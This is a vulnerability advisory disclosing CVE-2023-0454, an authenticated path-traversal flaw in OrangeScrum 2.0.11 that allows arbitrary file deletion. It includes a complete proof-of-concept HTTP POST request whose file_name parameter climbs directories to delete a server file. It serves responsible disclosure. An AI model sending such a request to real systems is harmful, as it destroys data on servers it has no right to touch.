OrangeScrum 2.0.11 - Arbitrary File Delete via file_name

Summary

NameOrangeScrum 2.0.11 - Arbitrary File Delete via file_name
Code nameSlushii
ProductOrangeScrum
Affected versions2.0.11
StatePublic
Release Date2023-01-30

Vulnerability

KindLack of data validation - Path Traversal
Rule063. Lack of data validation - Path Traversal
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
CVSSv3 Base Score8.1
Exploit availableNo
CVE ID(s)CVE-2023-0454

Description

OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.

Vulnerability

This vulnerability occurs because the application uses an unsanitized attacker-controlled parameter to construct an internal path.

Exploit

To exploit this vulnerability, we only need to send the following malicious malicious request to the server.

POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close

file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt

Evidence of exploitation

vulnerability-code

before-delete

delete-file-proxy

after-delete

Our security policy

We have reserved the ID CVE-2023-0454 to refer to this issue from now on.

System Information

  • Version: OrangeScrum 2.0.11

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/Orangescrum/orangescrum/

Timeline

Time-lapse-logo

2023-01-23

Vulnerability discovered.

Time-lapse-logo

2023-01-23

Vendor contacted.

Time-lapse-logo

2023-01-23

Vendor replied acknowledging the report.

Time-lapse-logo

2023-01-30

Public Disclosure.